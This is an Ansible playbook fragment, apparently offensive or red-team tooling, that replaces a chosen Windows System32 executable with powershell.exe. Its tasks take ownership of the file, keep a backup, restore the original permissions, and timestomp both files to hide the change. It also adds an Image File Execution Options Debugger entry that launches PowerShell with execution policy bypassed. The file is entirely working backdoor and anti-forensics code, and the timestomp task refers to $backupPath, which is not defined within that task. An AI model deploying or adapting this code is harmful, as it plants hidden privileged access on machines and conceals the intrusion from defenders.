- name: "Get original file stats for {{ target }}"
  ansible.windows.win_stat:
    path: "C:\\Windows\\System32\\{{ target }}"
  register: file_info

- name: "Backdoor File Replacement for {{ target }} - Takeown"
  ansible.windows.win_shell: |
    $targetPath = "C:\Windows\System32\{{ target }}"
    {% raw %}
    #$Acl = Get-Acl $targetPath
    (Get-Acl $targetPath).Sddl
    takeown /f $targetPath
    icacls $targetPath /grant administrators:F{% endraw %}
  register: original_sddl
  become: yes
  become_method: runas
  become_user: System
    
- name: "Backdoor File Replacement for {{ target }} - Backup"
  ansible.windows.win_shell: |
    $targetPath = "C:\Windows\System32\{{ target }}"
    $backupPath = $targetPath + ".outdated"
    if (-not (Test-Path $backupPath)) {
        Move-Item $targetPath $backupPath -Force
    }
  become: yes
  become_method: runas
  become_user: System

- name: "Backdoor File Replacement for {{ target }} - Replace"
  ansible.windows.win_shell: |
    $targetPath = "C:\Windows\System32\{{ target }}"
    Copy-Item "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $targetPath -Force
    $sddl = "{{ original_sddl.stdout.strip() }}"
    $Acl = New-Object System.Security.AccessControl.FileSecurity
    $Acl.SetSecurityDescriptorSddlForm($sddl)
    Set-Acl -Path $targetPath -AclObject $Acl
    #Set-Acl $targetPath $Acl
  become: yes
  become_method: runas
  become_user: System

- name: "Backdoor File Replacement for {{ target }} - Timestomp"
  ansible.windows.win_shell: |
    $targetPath = "C:\Windows\System32\{{ target }}"
    {% raw %}(Get-Item $targetPath).CreationTime = Get-Date {% endraw %}"{{ file_info.stat.creationtime }}"{% raw %}
    (Get-Item $targetPath).LastWriteTime = Get-Date {% endraw %}"{{ file_info.stat.lastwritetime }}"{% raw %}
    (Get-Item $targetPath).LastAccessTime = Get-Date {% endraw %}"{{ file_info.stat.atime }}"{% raw %}

    (Get-Item $backupPath).CreationTime = Get-Date {% endraw %}"{{ file_info.stat.creationtime }}"{% raw %}
    (Get-Item $backupPath).LastWriteTime = Get-Date {% endraw %}"{{ file_info.stat.lastwritetime }}"{% raw %}
    (Get-Item $backupPath).LastAccessTime = Get-Date {% endraw %}"{{ file_info.stat.atime }}"
  become: yes
  become_method: runas
  become_user: System

- name: "Apply IFEO Registry Redundancy for {{ target }}"
  ansible.windows.win_regedit:
    path: "HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\{{ target }}"
    name: Debugger
    data: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit'
    state: present